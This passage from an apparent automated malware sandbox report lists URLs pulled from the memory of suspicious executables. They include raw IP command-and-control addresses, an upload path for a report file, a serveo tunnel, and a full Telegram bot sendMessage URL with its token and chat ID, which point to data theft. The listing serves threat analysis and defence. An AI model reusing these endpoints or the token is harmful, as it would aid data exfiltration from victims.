                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.248.208.221:80
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.161.20.142:8080
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.202.101.219:8080
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:18772/handleOpenWSR?r=
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD859B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:18772/handleOpenWSR?r=http://185.119.118.59:8080/get/s9VbfeJdTs/hkLYW_user
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp, hahahahaha.txt.18.drString found in binary or memory: http://127.0.0.1:6787/
                  Source: vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB9D5000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD853B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:6787/ing=no
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://129.151.109.160:8080
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://144.126.132.141:8080
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://149.88.44.159:80
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://154.26.128.6:80
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.228.80.130:80
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.119.118.59
                  Source: vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.119.118.59:8080
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.119.118.59:8080/%68%6B%4C%59%57%5F%6A%6F%6E%65%73%40%34%36%38%33%32%35%5F%72%65%70%6F%72%
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.119.118.59:8080/get
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD859B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.119.118.59:8080/get/s9VbfeJdTs/hkLYW_user
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.119.118.59:8080/hkLYW_user
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.119.118.59:8080/hkLYW_user%40468325_report.wsr
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.119.118.59:8080/s9VbfeJdTs/hkLYW_user
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.119.118.59:80802
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.217.98.121:80
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.217.98.121:8080
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.142.58.127:80
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.142.58.127:80Pk
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.189.109.146:80
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.6.44.53:8080
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.250.190.139:80
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.224.102.6:8001
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.248.176.37:180
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.61.136.13:80
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.61.136.52:80
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.42.56.128:80
                  Source: jqOHOuPMJP.exe, 00000000.00000002.1817122140.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.147.85
                  Source: jqOHOuPMJP.exe, 00000000.00000002.1817122140.0000000002DAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.147.85.194
                  Source: jqOHOuPMJP.exe, 00000000.00000002.1817122140.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.147.85.194/byte/
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8574000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                  Source: vkefq4cv.oil.exe, 0000000B.00000002.4115442750.000001B8A9D61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
                  Source: vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB9E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://e2111f95f52ba8be6b2d3394e38b1722.serveo.net:6787//e2111f95f52ba8be6b2d3394e38b1722.serveo.net
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD7480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD7480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line?fields=query
                  Source: powershell.exe, 00000001.00000002.1715254235.000000000617A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000001.00000002.1717594364.000000000785F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/i?
                  Source: powershell.exe, 00000001.00000002.1712328855.0000000005266000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000001.00000002.1712328855.0000000005266000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC01A44000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D17F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: jqOHOuPMJP.exe, 00000000.00000002.1817122140.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1712328855.0000000005111000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997F9F000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A001B2000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC01B62000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1912000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000001.00000002.1712328855.0000000005266000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC01B33000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D18E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                  Source: Amcache.hve.41.drString found in binary or memory: http://upx.sf.net
                  Source: powershell.exe, 00000001.00000002.1712328855.0000000005266000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 00000001.00000002.1717242084.0000000007819000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co(=
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD7480000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD78E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://13.231.21.109:443
                  Source: vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://164.90.185.9:443
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://18.178.28.151:443
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://185.217.98.121:443
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://192.99.196.191:443
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://44.228.161.50:443
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://64.227.21.98:443
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: powershell.exe, 00000001.00000002.1712328855.0000000005111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.tele
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8574000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=51697
